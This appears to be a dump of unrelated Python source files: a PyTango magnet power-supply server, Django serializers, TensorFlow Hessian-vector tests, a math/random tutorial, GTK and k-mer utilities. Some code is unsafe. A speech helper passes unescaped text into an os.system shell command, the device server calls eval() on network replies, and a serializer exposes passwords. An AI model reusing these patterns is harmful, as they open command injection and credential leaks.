PyTango.Except.throw_exception('Communication Error','Bad answer','read_overCurrent()')
else:
self.attr_overCurrent_read = eval(sresp)
attr.set_value(self.attr_overCurrent_read)
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.overCurrent_read
def read_overTemperature(self, attr):
self.debug_stream("In read_overTemperature()")
#----- PROTECTED REGION ID(GMW.overTemperature_read) ENABLED START -----#
self.set_status("Reading data")
cmd_str="read_over_temperature"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if (sresp == resp_err or sresp != "True" or sresp != "False"):
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect reply, check command syntax!")
self.debug_stream("Incorrect reply: " +sresp)
PyTango.Except.throw_exception('Communication Error','Bad answer','read_overTemperature()')
else:
self.attr_overTemperature_read = eval(sresp)
attr.set_value(self.attr_overTemperature_read)
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.overTemperature_read
def read_interlockStatus(self, attr):
self.debug_stream("In read_interlockStatus()")
#----- PROTECTED REGION ID(GMW.interlockStatus_read) ENABLED START -----#
self.set_status("Reading data")
cmd_str="read_interlock"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
sresp = resp.rstrip("\r\n")
if (sresp == resp_err or sresp != "True" or sresp != "False"):
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect reply, check command syntax!")
self.debug_stream("Incorrect reply: " +sresp)
PyTango.Except.throw_exception('Communication Error','Bad answer','read_interlockStatus()')
else:
self.attr_interlockStatus_read = eval(sresp)
attr.set_value(self.attr_interlockStatus_read)
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
#----- PROTECTED REGION END -----# // GMW.interlockStatus_read
def read_magnetField_target(self, attr):
self.debug_stream("In read_magnetField_target()")
#----- PROTECTED REGION ID(GMW.magnetField_target_read) ENABLED START -----#
attr.set_value(self.attr_magnetField_target_read)
#----- PROTECTED REGION END -----# // GMW.magnetField_target_read
def read_attr_hardware(self, data):
self.debug_stream("In read_attr_hardware()")
#----- PROTECTED REGION ID(GMW.read_attr_hardware) ENABLED START -----#
#----- PROTECTED REGION END -----# // GMW.read_attr_hardware
# -------------------------------------------------------------------------
# GMW command methods
# -------------------------------------------------------------------------
#----- PROTECTED REGION ID(GMW.programmer_methods) ENABLED START -----#
def isGmwAlive(self):
self.debug_stream("In isGmwAlive()")
self.set_status("Reading/writing data")
cmd_str = "read_module_fault"
resp_err = "*** KEY ERROR"
resp_true = "True"
resp_false = "False"
resp = self.socket_write_and_read(cmd_str)
self.debug_stream("Received: " + str(resp))
if (resp.rstrip("\r\n")) == resp_err:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect request, check socket status !")
self.debug_stream("Incorrect request, check socket status !")
PyTango.Except.throw_exception('Communication Error','No reply from device','isGmwAlive()')
elif (resp.rstrip("\r\n")) == resp_false:
self.debug_stream("MOSFET Module Fault")
self.attr_moduleFault_read = "False"
return 0
elif (resp.rstrip("\r\n")) == resp_true:
self.debug_stream("MOSFET Module Working!")
self.attr_moduleFault_read = "True"
return 1
def read_current(self):
self.debug_stream("In read_current()")
cmd_str="read_current"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
if resp.rstrip("\r\n") == resp_err:
self.set_state(PyTango.DevState.FAULT)
self.set_status("Incorrect request, check command syntax!")
self.debug_stream("Incorrect request, check command syntax!")
PyTango.Except.throw_exception('Communication Error','Command not acknowledged','read_current()')
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
return float("{0:.5f}".format(float(resp)))
def read_voltage(self):
self.debug_stream("In read_voltage()")
cmd_str="read_voltage"
resp_err = "*** KEY ERROR"
resp = self.socket_write_and_read(cmd_str)
if resp.rstrip("\r\n") == resp_err:
self.set_state(PyTango.DevState.WARNING)
self.set_status("Incorrect request, check command syntax!")
self.debug_stream("Incorrect request, check command syntax!")
PyTango.Except.throw_exception('Communication Error','Command not acknowledged','read_voltage()')
if (resp == ''):
self.set_state(PyTango.DevState.WARNING)
self.set_status("The device responded with an empty string")
self.debug_stream("Incorrect reply: the device responded with an empty string!")
PyTango.Except.throw_exception('Communication Error','Command not acknowledged','read_voltage()')
if self.get_state() != PyTango.DevState.ON:
self.set_state(PyTango.DevState.ON)
return float("{0:.5f}".format(float(resp.rstrip("\r\n"))))
#------------------------------------------------------------------
# Connect socket utility
# Tries to connect and set device state
#------------------------------------------------------------------
def socket_connect(self):
try:
self.s.close()
del self.s
except:
pass
try:
# Connects to GMW hardware...
self.set_state(PyTango.DevState.ON)
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.settimeout(1)
self.s.connect((self.ip_address,self.port))
print self.ip_address,self.port
self.debug_stream("After connect")
'''if self.isGmwAlive():
self.set_status("Device initialised")
self.debug_stream("Device initialised!")
else:
self.set_state(PyTango.DevState.FAULT)
self.set_status("init_device() FAILED")
self.error_stream("init_device() FAILED")
'''
except socket.error, e:
self.set_state(PyTango.DevState.FAULT)
self.set_status("init_device() FAILED")
self.error_stream("Couldn't connect with the socket: %s" % e )
#self.s.close()
#------------------------------------------------------------------
# Read/write socket utility
# Returns a string in case of a proper reply,
# 0 for failure, 1 for succesful reply, 2 for NAK.
#------------------------------------------------------------------
def socket_write_and_read(self, argin):
if self.get_state() == PyTango.DevState.FAULT:
self.socket_connect()
if self.get_state() != PyTango.DevState.ON:
PyTango.Except.throw_exception('Communication Error','Socket Connection Error','socket_write_and_read()')
self.debug_stream("In socket_write_and_read()")
self.set_status("Reading/writing socket")
resp_err = "*** KEY ERROR"
argin = str(argin)
picocommand = argin.rstrip('\r\n')+"\r\n"
attempts = 0
max_attempts = 2 # In an exception, retry once.
while (attempts < max_attempts):
try:
attempts += 1
reply=''
self.debug_stream("Sending command " + picocommand.rstrip('\r\n') + " to GMW...")
self.s.send(picocommand)
read_list = [self.s]
readable,writable,errored = select.select(read_list,[],[],0.5)
for rsock in readable:
if self.s is rsock:
#reply = ''
while "\r\n" not in reply:
read_data = self.s.recv(1024)
reply += read_data
self.debug_stream("Data received: " + str(reply.rstrip('\r\n')))
if reply == resp_err:
self.status_string = "Cmd " + picocommand + " failed, no reply"
self.debug_stream("Command " + picocommand + " failed")
#return 0
elif len(reply) > 0:
return reply
except socket.error:
self.set_state(PyTango.DevState.FAULT)
PyTango.Except.throw_exception('Communication Error','Socket Error','socket_write_and_read()')
self.error_stream("Socket connection raised exception ")
self.debug_stream("Socket connection raised exception ")
except Exception:
self.set_state(PyTango.DevState.FAULT)
PyTango.Except.throw_exception('Communication Error','General Communication Error','socket_write_and_read()')
err_msg = traceback.print_exc(file=sys.stdout)
self.debug_stream("Exception thrown: "+ str(err_msg))
# Socket problem persists, set state to FAULT
self.set_state(PyTango.DevState.FAULT)
PyTango.Except.throw_exception('Communication Error','No reply from device','socket_write_and_read()')
#----- PROTECTED REGION END -----# // GMW.programmer_methods
class GMWClass(PyTango.DeviceClass):
# -------- Add you global class variables here --------------------------
#----- PROTECTED REGION ID(GMW.global_class_variables) ENABLED START -----#
#----- PROTECTED REGION END -----# // GMW.global_class_variables
# Class Properties
class_property_list = {
}
# Device Properties
device_property_list = {
'ip_address':
[PyTango.DevString,
"TCP Server IP address.",
["172.19.10.65"] ],
'port':
[PyTango.DevLong,
'',
[55000]],
}
# Command definitions
cmd_list = {
}
# Attribute definitions
attr_list = {
'magnetField':
[[PyTango.DevFloat,
PyTango.SCALAR,
PyTango.READ_WRITE],
{
'label': "Magnetic Field Intensity",
'unit': "Gauss",
'display unit': "kG",
} ],
'currentMonitor':
[[PyTango.DevFloat,
PyTango.SCALAR,
PyTango.READ],
{
'label': "Current Monitor",
'unit': "[A]",
'display unit': "[A]",
'description': "+/-1V / 10A",
} ],
'voltageMonitor':
[[PyTango.DevFloat,
PyTango.SCALAR,
PyTango.READ],
{
'label': "Voltage Monitor",
'unit': "[V]",
'display unit': "[V]",
'description': "+/-1V / 20V",
} ],
'fieldMonitorPlus':
[[PyTango.DevFloat,
PyTango.SCALAR,
PyTango.READ],
{
'label': "Field Monitor Plus",
} ],
'fieldMonitorMinus':
[[PyTango.DevFloat,
PyTango.SCALAR,
PyTango.READ],
{
'label': "Field Monitor Minus",
} ],
'amplifierPower':
[[PyTango.DevBoolean,
PyTango.SCALAR,
PyTango.READ],
{
'label': "+5V (Amplifier Power)",
'description': "Active high, the 231HC DC supply is providing sufficient voltage for operation.",
} ],
'normal':
[[PyTango.DevBoolean,
PyTango.SCALAR,
PyTango.READ],
{
'label': "Normal",
'description': "Active low, the 231HC is ready and ill operate when not inhibited.",
} ],
'inhibit':
[[PyTango.DevBoolean,
PyTango.SCALAR,
PyTango.READ],
{
'label': "Inhibit",
'description': "Active low, the front panel inhibit switch is active.",
} ],
'moduleFault':
[[PyTango.DevBoolean,
PyTango.SCALAR,
PyTango.READ],
{
'label': "Module Fault",
'description': "Active low, the 231HC has a fault in the MOSFET power output module.",
} ],
'dcFault':
[[PyTango.DevBoolean,
PyTango.SCALAR,
PyTango.READ],
{
'label': "DC Fault",
'description': "Active low, one or more DC voltages are outside operating limits.",
} ],
'overCurrent':
[[PyTango.DevBoolean,
PyTango.SCALAR,
PyTango.READ],
{
'label': "Over Current",
'description': "Active low, the 231HC is disabled due to current over limits.",
} ],
'overTemperature':
[[PyTango.DevBoolean,
PyTango.SCALAR,
PyTango.READ],
{
'label': "Over Temperature",
'description': "Active low, the 231HC is disabled due to an over temperature condition.",
} ],
'interlockStatus':
[[PyTango.DevBoolean,
PyTango.SCALAR,
PyTango.READ],
{
'label': "Interlock Status",
} ],
'magnetField_target':
[[PyTango.DevFloat,
PyTango.SCALAR,
PyTango.READ],
{
'label': "Magnetic Field Intensity",
'unit': "Gauss",
'display unit': "kGauss",
} ],
}
def main():
try:
py = PyTango.Util(sys.argv)
py.add_class(GMWClass, GMW, 'GMW')
#----- PROTECTED REGION ID(GMW.add_classes) ENABLED START -----#
#----- PROTECTED REGION END -----# // GMW.add_classes
U = PyTango.Util.instance()
U.server_init()
U.server_run()
except PyTango.DevFailed as e:
print ('-------> Received a DevFailed exception:', e)
except Exception as e:
print ('-------> An unforeseen exception occured....', e)
if __name__ == '__main__':
main()
|
21,547 | ed91358303d2a57a848748824b9c9f55bf46f818 | from rest_framework import serializers
from .models import User
class GetAllUser(serializers.ModelSerializer):
class Meta:
model = User
fields = ('username', 'email', 'sex', 'phone_number', 'date_of_birth', 'school', 'image', 'password') |
21,548 | ddd0756a46affb321f9e43ef8939acdc98d73b26 | from django.urls import path
from rest_framework import routers
from pyrunner import views
from .api import PyrunnerViewSet
app_name = 'pyrunner'
router = routers.DefaultRouter()
router.register('', PyrunnerViewSet, 'code')
urlpatterns = router.urls
|
21,549 | 0c7c5e0fb9dbf894597d7211e5f266cd5c954dde | """
Unit testing second order matrix vector product.
"""
from __future__ import (division, print_function, unicode_literals)
import numpy as np
import tensorflow as tf
from tensorflow_forward_ad import logger
from tensorflow_forward_ad.fwgrad import forward_gradients
from tensorflow_forward_ad.second_order import (
hessian_vec_fw, hessian_vec_bk, gauss_newton_vec, fisher_vec_fw,
fisher_vec_bk, gauss_newton_vec_z, fisher_vec_z)
log = logger.get()
class TestSecondOrderFwGrad(tf.test.TestCase):
def test_hessian_quadratic(self):
rnd = np.random.RandomState(0)
dtype = tf.float64
with tf.Graph().as_default():
r = tf.Variable(0.0, dtype=dtype)
x = tf.constant(rnd.uniform(-1.0, 1.0, [2, 27]), dtype=dtype, name="x")
w2 = tf.constant(rnd.uniform(-1.0, 1.0, [27, 1]), dtype=dtype, name="w2")
v2 = tf.constant(rnd.uniform(-1.0, 1.0, [27, 1]), dtype=dtype, name="v2")
w2v = tf.add(w2, tf.multiply(r, v2))
h2 = tf.matmul(x, w2v)
y2 = tf.reduce_sum(h2 * h2)
grad_w = tf.gradients(y2, w2)
hv_fw = hessian_vec_fw(y2, [w2v], [v2])
hv_bk = hessian_vec_bk(y2, [w2], [v2])
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
grad_w = sess.run(grad_w)
hv_fw_val = sess.run(hv_fw)
hv_bk_val = sess.run(hv_bk)
np.testing.assert_allclose(hv_fw_val, hv_bk_val, rtol=1e-5)
def test_sparse_softmax_with_logits_grad(self):
rnd = np.random.RandomState(0)
dtype = tf.float64 # Use float64 and CPU for finite difference checking.
with tf.Graph().as_default(), tf.device("/cpu:0"):
r = tf.Variable(0.0, dtype=dtype)
# Input.
x = tf.constant(rnd.uniform(-1.0, 1.0, [2, 27]), dtype=dtype, name="x")
# Fully connected.
v = tf.constant(rnd.uniform(-0.1, 0.1, [27, 2]), dtype=dtype, name="v")
w = tf.constant(rnd.uniform(-1.0, 1.0, [27, 2]), dtype=dtype, name="w")
y = tf.matmul(x, w + r * v)
label = tf.constant([1, 0], dtype=tf.int32)
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=y, labels=label)
loss = tf.reduce_sum(loss)
hv_fw = hessian_vec_fw(loss, [w], [v])[0]
# hv_bk = hessian_vec_bk(loss, [w], [v])[0]
grad_w = tf.gradients(loss, [w])[0]
with self.test_session() as sess:
# Compute Hv with finite difference.
sess.run(tf.global_variables_initializer())
eps = 1e-5
sess.run(tf.assign(r, -eps))
grad_w_val1 = sess.run(grad_w)
sess.run(tf.assign(r, eps))
grad_w_val2 = sess.run(grad_w)
fndv = (grad_w_val2 - grad_w_val1) / (2 * eps)
# Compute Hv with forward mode autodiff.
sess.run(tf.global_variables_initializer())
fwv = sess.run(hv_fw)
# # Compute Hv with reverse mode autodiff.
# bkv = sess.run(hv_bk)
np.testing.assert_allclose(fndv, fwv, rtol=1e-5)
# # Expect failure here.
#np.testing.assert_allclose(fndv, bkv, rtol=1e-5)
def test_softmax_grad(self):
rnd = np.random.RandomState(0)
dtype = tf.float64 # Use float64 and CPU for finite difference checking.
with tf.Graph().as_default(), tf.device("/cpu:0"):
r = tf.Variable(0.0, dtype=dtype)
# Input.
x = tf.constant(rnd.uniform(-1.0, 1.0, [2, 27]), dtype=dtype, name="x")
# Fully connected.
v = tf.constant(rnd.uniform(-0.1, 0.1, [27, 2]), dtype=dtype, name="v")
w = tf.constant(rnd.uniform(-1.0, 1.0, [27, 2]), dtype=dtype, name="w")
y = tf.matmul(x, w + r * v)
label = tf.constant([1, 0], dtype=tf.int32)
y = tf.nn.softmax(y)
t = tf.one_hot(label, 2, dtype=dtype)
loss = tf.log(y + 1e-5) * t
loss = tf.reduce_sum(loss)
hv_fw = hessian_vec_fw(loss, [w], [v])[0]
hv_bk = hessian_vec_bk(loss, [w], [v])[0]
grad_w = tf.gradients(loss, [w])[0]
with self.test_session() as sess:
# Compute Hv with finite difference.
sess.run(tf.global_variables_initializer())
eps = 1e-5
sess.run(tf.assign(r, -eps))
grad_w_val1 = sess.run(grad_w)
sess.run(tf.assign(r, eps))
grad_w_val2 = sess.run(grad_w)
fndv = (grad_w_val2 - grad_w_val1) / (2 * eps)
# Compute Hv with forward mode autodiff.
sess.run(tf.global_variables_initializer())
fwv = sess.run(hv_fw)
# Compute Hv with reverse mode autodiff.
bkv = sess.run(hv_bk)
np.testing.assert_allclose(fndv, fwv, rtol=1e-5)
np.testing.assert_allclose(fndv, bkv, rtol=1e-5)
np.testing.assert_allclose(fwv, bkv, rtol=1e-5)
def _test_hessian_cnn(self):
rnd = np.random.RandomState(0)
dtype = tf.float32 # Use float64 and CPU for finite difference checking.
# tf.nn.conv2d and tf.nn.max_pool does not support float64.
# with tf.Graph().as_default(), tf.device("/cpu:0"):
with tf.Graph().as_default():
# Input.
x = tf.constant(
np.random.uniform(-1.0, 1.0, [2, 5, 5, 2]), dtype=dtype, name="x")
# First convolution.
v = tf.constant(
np.random.uniform(-0.1, 0.1, [2, 2, 2, 3]), dtype=dtype, name="v")
w = tf.constant(
np.random.uniform(-1.0, 1.0, [2, 2, 2, 3]), dtype=dtype, name="w")
h = tf.nn.conv2d(x, w, [1, 1, 1, 1], "SAME")
h = tf.nn.max_pool(h, [1, 3, 3, 1], [1, 2, 2, 1], "SAME")
h = tf.nn.relu(h)
# Second convolution.
v_ = tf.constant(
np.random.uniform(-0.1, 0.1, [2, 2, 3, 3]), dtype=dtype, name="v_")
w_ = tf.constant(
np.random.uniform(-1.0, 1.0, [2, 2, 3, 3]), dtype=dtype, name="w_")
h = tf.nn.conv2d(h, w_, [1, 1, 1, 1], "SAME")
h = tf.nn.sigmoid(h)
# Fully connected.
dim = 27
v2 = tf.constant(rnd.uniform(-0.1, 0.1, [dim, 2]), dtype=dtype, name="v2")
w2 = tf.constant(rnd.uniform(-1.0, 1.0, [dim, 2]), dtype=dtype, name="w2")
w2v = w2 + r * v2
h = tf.reshape(h, [-1, dim])
y = tf.matmul(h, w2v)
label = tf.constant([1, 0], dtype=tf.int32)
# loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
# logits=y, labels=label)
# loss = tf.reduce_sum(loss)
# Use manual cross entropy.
label_dense = tf.one_hot(label, 2, dtype=dtype)
y = tf.nn.softmax(y)
loss = label_dense * tf.log(y + 1e-5)
loss = tf.reduce_sum(loss)
# Using explicit R-op is deprecated, due to complex model building.
hv_fw = hessian_vec_fw(loss, [w2v, w_v, wv], [v2, v_, v])
hv_bk = hessian_vec_bk(loss, [w2, w_, w], [v2, v_, v])
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
hv_fw_val = sess.run(hv_fw)
hv_bk_val = sess.run(hv_bk)
for fwv, bkv in zip(hv_fw_val, hv_bk_val):
np.testing.assert_allclose(fwv, bkv, rtol=1e-5)
def test_gauss_newton_quadratic(self):
rnd = np.random.RandomState(0)
with tf.Graph().as_default():
r = tf.Variable(0.0)
x = tf.constant(
rnd.uniform(-1.0, 1.0, [2, 27]), dtype=tf.float32, name="x")
w = tf.constant(
rnd.uniform(-1.0, 1.0, [27, 3]), dtype=tf.float32, name="w2")
v = tf.constant(
rnd.uniform(-1.0, 1.0, [27, 3]), dtype=tf.float32, name="v2")
wv = tf.add(w, tf.multiply(r, v))
z = tf.matmul(x, wv)
y = 0.5 * tf.reduce_sum(z * z)
# Gauss-Newton, same as Fisher for square loss.
gv_fw = gauss_newton_vec(y, z, [w], [v])[0]
# Fisher towards the output layer.
fv_fw = fisher_vec_fw(z, [w], [v])
# Fisher using tf.gradients (reverse mode).
fv_bk = fisher_vec_bk(y, [w], [v])
# Fisher using forward mode, towards loss function.
fv_fw_y = fisher_vec_fw(y, [w], [v])
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
gv_fw_val = sess.run(gv_fw)
fv_fw_val = sess.run(fv_fw)
np.testing.assert_allclose(gv_fw_val, fv_fw_val, rtol=1e-5, atol=1e-5)
fv_fw_y_val = sess.run(fv_fw_y)
fv_bk_val = sess.run(fv_bk)
np.testing.assert_allclose(fv_fw_y_val, fv_bk_val, rtol=1e-5, atol=1e-5)
def test_gauss_newton_output_quadratic(self):
rnd = np.random.RandomState(0)
with tf.Graph().as_default():
x = tf.constant(
rnd.uniform(-1.0, 1.0, [27, 2]), dtype=tf.float32, name="x")
h = tf.constant(
rnd.uniform(-1.0, 1.0, [3 * 2, 3 * 2]), dtype=tf.float32, name="h")
h = tf.matmul(tf.transpose(h), h)
j = tf.constant(
rnd.uniform(-1.0, 1.0, [3, 27]), dtype=tf.float32, name="j")
z = tf.matmul(j, x) # [3, 2]
z_ = tf.reshape(z, [3 * 2, 1]) # [6, 1]
y = 0.5 * tf.matmul(tf.matmul(tf.transpose(z_), h), z_) # [1, 1]
v = tf.constant(
rnd.uniform(-1.0, 1.0, [3, 2]), dtype=tf.float32, name="v")
act_jv = tf.gradients(z, x, v, gate_gradients=True)[0]
act_hjjv = gauss_newton_vec_z(y, z, x, v)[0]
exp_jv = tf.matmul(tf.transpose(j), v) # [27, 2]
exp_jjv = tf.matmul(j, exp_jv) # [3, 2]
exp_jjv_ = tf.reshape(exp_jjv, [3 * 2, 1])
exp_hjjv = tf.matmul(h, exp_jjv_) # [6, 1]
exp_hjjv = tf.reshape(exp_hjjv, [3, 2])
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
h_val = sess.run(h)
e, _ = np.linalg.eig(h_val)
self.assertTrue((e > 0).all())
act_hjjv_val, exp_hjjv_val, act_jv_val, exp_jv_val = sess.run(
[act_hjjv, exp_hjjv, act_jv, exp_jv])
np.testing.assert_allclose(act_jv_val, exp_jv_val, rtol=1e-5)
np.testing.assert_allclose(act_hjjv_val, exp_hjjv_val, rtol=1e-5)
def test_fisher_output_quadratic(self):
rnd = np.random.RandomState(0)
with tf.Graph().as_default():
x = tf.constant(
rnd.uniform(-1.0, 1.0, [27, 2]), dtype=tf.float32, name="x")
h = tf.constant(
rnd.uniform(-1.0, 1.0, [3 * 2, 3 * 2]), dtype=tf.float32, name="h")
h = tf.matmul(tf.transpose(h), h)
j = tf.constant(
rnd.uniform(-1.0, 1.0, [3, 27]), dtype=tf.float32, name="j")
z = tf.matmul(j, x) # [3, 2]
z_ = tf.reshape(z, [3 * 2, 1]) # [6, 1]
y = 0.5 * tf.matmul(tf.matmul(tf.transpose(z_), h), z_) # [1, 1]
v = tf.constant(
rnd.uniform(-1.0, 1.0, [3, 2]), dtype=tf.float32, name="v")
act_jjv = fisher_vec_z(z, x, v)[0]
exp_jv = tf.matmul(tf.transpose(j), v) # [27, 2]
exp_jjv = tf.matmul(j, exp_jv) # [3, 2]
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
act_jjv_val, exp_jjv_val = sess.run([act_jjv, exp_jjv])
np.testing.assert_allclose(act_jjv_val, exp_jjv_val, rtol=1e-5)
if __name__ == "__main__":
tf.test.main()
|
21,550 | daabe38be26e31998ca786eedd32700e61c18440 | import math
help(math) #me dice que cosas tiene math
value = 4.35
math.floor(value) # redondea al valor mas chico
math.ceil(value) #redondea al valor mas grande
round(value) #redondea
round(4.5) # va para abajo
round(5.5) #va para arriba
#siempre se intenta redondear a numeros pares
math.pi
from math import pi
pi
math.e
math.inf #infinito
math.nan #not a number
math.log(math.e)
math.log(100,10) #me devuelve lo que tendria que elevar al cuadrado a 10 para que me de 100 en este caso seria 10**2
math.sin(10)
math.degrees(pi/2)
math.radians(180)
#vamos a random module
import random
random.randint(0,100)
random.seed(101) #tengo que correr todo el codigo de abajo junto con esta linea para que me de los mismos numeros todo el tiempo
print(random.randint(0,100)) # es decir, por mas veces que corra el codigo, este me deberia dar 74 siempre (a menos que reinicie seed en ese caso cambiaria a otro numero)
print(random.randint(0,100)) # lo mismo con este
print(random.randint(0,100)) # etc...
print(random.randint(0,100))
print(random.randint(0,100))
print(random.randint(0,100))
print(random.randint(0,100))
#random item from list
mylist = list(range(0,20))
mylist
random.choice(mylist)
#grab multiple items from list
#sample with replacement, allow int to be chocen more than once
random.choices(population=mylist,k=10) #ddeberia tocar numeros iguales en algun momento
#sample without replacement, una vez que se elige un numero, no te puede tocaar de nuevo
random.sample(population=mylist,k=10)
#shuffle, se te queda para siempre shuffled
random.shuffle(mylist)
mylist
random.uniform(a=0,b=100)#randomly pick a value between a and b, floating points are allowed, cada numero tiene la misma likelyhood de ser elegido
random.gauss(mu=0, sigma=1) #normal distribution |
21,551 | 4b0ed3df61f6aec82084d1ed983ed5335869ce58 | import gi
from CanvasElement import CanvasElement
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
class PacketInfoField(CanvasElement):
def __init__(self):
CanvasElement.__init__(self, "Packet Information")
valueLabel = Gtk.Entry()
valueLabel.set_text("Value")
valueLabel.set_editable(False)
textDescriptionLabel = Gtk.Entry()
textDescriptionLabel.set_text("Text Description")
textDescriptionLabel.set_editable(False)
row = Gtk.ListBoxRow()
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=0)
row.add(hbox)
hbox.pack_start(valueLabel, True, True, 0)
hbox.pack_start(textDescriptionLabel, True, True, 0)
self.listbox.add(row)
valueEntry = Gtk.Entry()
valueEntry.set_text("")
valueEntry.set_editable(False)
TextDescriptionEntry = Gtk.Entry()
TextDescriptionEntry.set_text("")
TextDescriptionEntry.set_editable(False)
row = Gtk.ListBoxRow()
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=0)
row.add(hbox)
hbox.pack_start(valueEntry, True, True, 0)
hbox.pack_start(TextDescriptionEntry, True, True, 0)
self.listbox.add(row)
addButton = Gtk.Button("+")
emptyLabel = Gtk.Label("")
row = Gtk.ListBoxRow()
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=0)
row.add(hbox)
hbox.pack_start(emptyLabel, True, True, 100)
hbox.pack_start(addButton, False, False, 0)
self.listbox.add(row)
|
21,552 | f42a04593832516f9fe5e789bffcfed414563061 | import hashlib
from os import system, path
class Speech(object):
def __init__(self):
self.file_path = path.dirname(path.realpath(__file__)) + "/static/"
def hash_file(self, text):
return hashlib.sha224(text).hexdigest() + ".mp3"
def exists(self, filename):
return path.isfile(self.file_path + filename)
def make(self, text, text_type="ssml"):
fn = self.hash_file(text)
if self.exists(fn):
return fn
system('aws polly synthesize-speech --text-type %s --text "%s" --output-format mp3 --voice-id Joanna %s' % (
text_type,
text,
self.file_path+fn
))
return fn
def chime(self):
chime = "mplayer -ao alsa -really-quiet -noconsolecontrols %schime.mp3"
system(chime % (self.file_path))
def say(self, text):
fn = self.make(text)
speech = "mplayer -ao alsa -really-quiet -noconsolecontrols %s%s"
system(speech % (self.file_path, fn))
|
21,553 | d260ff9b9e5f58b66b7dc1d2de57b0a63b2cddf3 | import sys
import re
import numpy as np
from ..utils.utils_words import make_km_list
from ..utils.utils_bow import frequency
from ..utils.utils_fasta import get_seqs
def find_rev_comp(sequence, rev_comp_dictionary):
# Save time by storing reverse complements in a hash.
if sequence in rev_comp_dictionary:
return rev_comp_dictionary[sequence]
# Make a reversed version of the string.
rev_sequence = list(sequence)
rev_sequence.reverse()
rev_sequence = ''.join(rev_sequence)
return_value = ""
for letter in rev_sequence:
if letter == "A":
return_value += "T"
elif letter == "C":
return_value += "G"
elif letter == "G":
return_value += "C"
elif letter == "T":
return_value += "A"
elif letter == "N":
return_value += "N"
else:
error_info = ("Unknown DNA character (%s)\n" % letter)
sys.exit(error_info)
# Store this value for future use.
rev_comp_dictionary[sequence] = return_value
return return_value
def _cmp(a, b):
return (a > b) - (a < b)
def make_rev_comp_km_list(km_list):
rev_comp_dictionary = {}
new_km_list = [km for km in km_list if _cmp(km, find_rev_comp(km, rev_comp_dictionary)) <= 0]
return new_km_list
def km_bow(input_file, k, alphabet, rev_comp=False):
"""Generate km vector."""
if rev_comp and re.search(r'[^acgtACGT]', ''.join(alphabet)) is not None:
sys.exit("Error, Only DNA sequence can be reverse compliment.")
with open(input_file, 'r') as f:
seq_list = get_seqs(f, alphabet)
vector = []
km_list = make_km_list(k, alphabet)
non = 1
for seq in seq_list:
print(non)
non += 1
count_sum = 0
# Generate the km frequency dict.
km_count = {}
for km in km_list:
temp_count = frequency(seq, km)
if not rev_comp:
if km not in km_count:
km_count[km] = 0
km_count[km] += temp_count
else:
rev_km = find_rev_comp(km, {})
if km <= rev_km:
if km not in km_count:
km_count[km] = 0
km_count[km] += temp_count
else:
if rev_km not in km_count:
km_count[rev_km] = 0
km_count[rev_km] += temp_count
count_sum += temp_count
# Normalize.
if not rev_comp:
count_vec = [km_count[km] for km in km_list]
else:
rev_comp_km_list = make_rev_comp_km_list(km_list)
count_vec = [km_count[km] for km in rev_comp_km_list]
count_vec = [round(float(e) / count_sum, 8) for e in count_vec]
vector.append(count_vec)
return np.array(vector)
|
21,554 | 2536e8d70dce42e9b41df43c5b17d093182eb827 | # -*- coding: utf-8 -*-
from __future__ import division
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import scoped_session
import logging
# from selenium import webdriver
# from selenium.webdriver.common.by import By
# from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
# from selenium.webdriver.support import expected_conditions as EC # available since 2.26.0
from datetime import datetime
import humanize
import os
import shutil
from ftplib import FTP
import requests
from contextlib import closing
from pyquery import PyQuery as pq
# #scoped_session 线程安全
# def create_scoped_session(engine, base):
# Session = sessionmaker(bind=engine) # 创建一个Session类
# session = scoped_session(Session) # 生成一个Session实例
#
# return session
# def wp_logging(level='debug', Msg='Msg',allow_print=True):
# if level=='debug':
# if allow_print:
# print Msg
# logging.debug(Msg)
# return
# def get_or_create(session, model, is_global=False, defaults=None, filter_cond=None,**kwargs):
# """
# @is_global=False #db_session 是不是全局性的,是,则不能在这里关闭。
# """
# created = None
# if filter_cond is not None:
# instance = session.query(model).filter_by(**filter_cond).first()
# else:
# instance = session.query(model).filter_by(**kwargs).first()
# if instance:
# created = False
# # 文章存在 --> 返回文章实例 ,(没有新建)False
# if not is_global:
# session.close()
# return instance,created
# else:
# created = True
# # params = dict((k, v) for k, v in kwargs.iteritems())
# # params.update(defaults or {})
# instance = model(**kwargs)
# if not is_global:
# session.add(instance)
# session.commit()
# session.close()
# # 文章不存在 --> 返回文章实例 ,(有新建)True
# return instance, created
# class FirefoxDriver():
#
# def __init__(self):
# self.login_url = 'http://www.uploadable.ch/login.php'
# # url_login = 'http://www.uploadable.ch/login.php'
# # url_download = 'http://www.uploadable.ch/file/SwkwFPd7scRC/123.pdf'
#
#
# self.ffprofile = webdriver.FirefoxProfile(FirefoxProfilePath)
# self.driver = None
# self.create_time = datetime.now()
# self.login_time = None
# def get_new_driver(self):
# driver = webdriver.Firefox(self.ffprofile)
# driver.get(self.login_url)
# inputElement_userName = driver.find_element_by_name("userName")
# inputElement_userPassword = driver.find_element_by_name("userPassword")
